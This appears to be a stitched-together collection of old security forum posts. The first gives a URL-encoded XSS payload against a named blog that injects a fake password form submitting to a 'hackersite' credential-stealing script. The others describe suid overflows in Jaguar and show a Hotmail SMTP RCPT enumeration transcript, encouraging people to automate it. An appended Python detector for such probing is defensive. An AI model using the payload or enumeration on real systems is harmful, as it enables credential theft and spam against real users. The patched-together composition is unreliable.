well how about that.
% 3Cbr+%2F%3E%3Cimg+src%3Dhttp%3A%2F%2Fwww.alan-alda .com%2Falan-alda.jpg%3E%3Cbr+%2F%3E%3Ch2%3EWelcome +to+the+Alan+Alda+fanclub.+Please+enter+your+passw ord.%3C%2Fh2%3E%3Cform+id%3D%22searchform%22+metho d%3D%22get%22+action%3D%22http%3A%2F%2Fwww.hackers ite.com%2Fstealscript%22%3E%3Cinput+type%3D%22text %22+name%3D%22s%22+id%3D%22s%22+size%3D%2215%22+%2 F%3E%3Cbr+%2F%3E%3Cinput+type%3D%22submit%22+value %3D%22Submit%22+%2F%3E%3C%2Fform%3E%3Cbr+%2F%3E
http://neosmart.net/blog/index.php?s=%3Cbr+%2F%3E
Note: if you are actually a member, please do not input your password. This is merely an XSS trick demonstrating a total lack of vulnerability, sloppy coding or naivety on the part of neosmart.
I have recently audited an xserver running the latest Jaguar. Within the first 20 minutes of looking, I found 3 command-line overflows for suid apps. These are textbook overflows and appear to be trivial to exploit. IMHO the developers have performed very little vulnerability (fuzz) testing against their privileged applications and services. Many many more bugs will be found. I encourage any newbie vulnerability researchers to get their hands on a copy of Jaguar ASAP. As mentioned in a previous post, file permissions are screwed up all over the system, and the amount of suid binaries is astonishing. You *will* find *many* vulnerabilities.
Surely more than just a handful of spammers know that Hotmail's SMTP servers are vulnerable to RCPT brute forcing of valid accounts?
Observe:
220 mc5-f36.law1.hotmail.com Microsoft ESMTP MAIL Service, Version: 5.0.2195.5600 ready
helo slashdot.org
250 mc5-f36.law1.hotmail.com Hello []
mail from: <humanaut@nowhere.com>
250 humanaut@nowhere.com....Sender OK
rcpt to: <nosuchhotmailuser@hotmail.com>
550 Requested action not taken: mailbox unavailable
rcpt to: <dennis@hotmail.com>
250 dennis@hotmail.com
rpct to: <fred@hotmail.com>
250 fred@hotmail.com
rcpt to: <vndsad@hotmail.com>
550 Requested action not taken: mailbox unavailable
There are numerous scripts and exes (probably) around to automate this procedure - I'm sure I've seen a mass mailer program or two that mentioned expn/vrfy/rcpt verification or brute forcing...
That is why, IMO, everyone with a short or simple username at Hotmail receives so much spam! I'm sure Hotmail/MSN have been warned numerous times, and I guarantee there are hordes of spammers hammering away with RCPT brute forcers at those boxes 24/7.
Anyway... any average scripter should be able to knock something up to feed a list of usernames through the helo/mailfrom/rcptto routine... and I'm sure most seasoned spammers are average scripters.
.humanaut.
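As an added example (not from the post or its author), here is a small Python detector that reads a session transcript shaped like the one quoted above and flags the recipient-probing pattern: several RCPT TO commands, a high share of 550 "mailbox unavailable" replies, and no DATA command ever issued. Both sample sessions are constructed, and the thresholds are assumptions to tune against real mail logs.

```python
import re

# Constructed sample, same shape as the transcript quoted in the post.
PROBE_SESSION = """\
rcpt to: <nosuchhotmailuser@hotmail.com>
550 Requested action not taken: mailbox unavailable
rcpt to: <dennis@hotmail.com>
250 dennis@hotmail.com
rcpt to: <fred@hotmail.com>
250 fred@hotmail.com
rcpt to: <vndsad@hotmail.com>
550 Requested action not taken: mailbox unavailable
"""
# Constructed sample: an ordinary delivery, one recipient then DATA.
NORMAL_SESSION = """\
rcpt to: <bob@example.net>
250 bob@example.net
DATA
354 Start mail input
"""

RCPT_RE = re.compile(r"^rcpt\s+to:\s*<?([^>\s]+)>?", re.IGNORECASE)

def rcpt_stats(transcript):
    """Pair each RCPT TO with the reply that follows it; returns (attempts, accepted, rejected, data_seen)."""
    attempts = accepted = rejected = 0
    pending, data_seen = None, False      # pending = recipient awaiting its reply
    for line in transcript.splitlines():
        line = line.strip()
        m = RCPT_RE.match(line)
        if m:
            pending, attempts = m.group(1), attempts + 1
            continue
        if line.upper() == "DATA":
            data_seen = True
        elif pending and line[:3].isdigit():
            code = int(line[:3])
            if 200 <= code < 300:
                accepted += 1
            elif code >= 500:
                rejected += 1
            pending = None                # 4xx replies are neither counted
    return attempts, accepted, rejected, data_seen

def looks_like_enumeration(transcript, min_rcpts=3, min_reject_ratio=0.3):
    """Many RCPTs, a high share of 5xx rejections and no DATA: address probing, not delivery."""
    attempts, _, rejected, data_seen = rcpt_stats(transcript)
    return attempts >= min_rcpts and not data_seen and rejected / attempts >= min_reject_ratio
```

The server-side fix is to stop answering RCPT TO differently for existing and non-existing mailboxes (accept at RCPT time and reject later) and to rate-limit per-source recipient failures; the detector above is what you would run over the logs until that is in place.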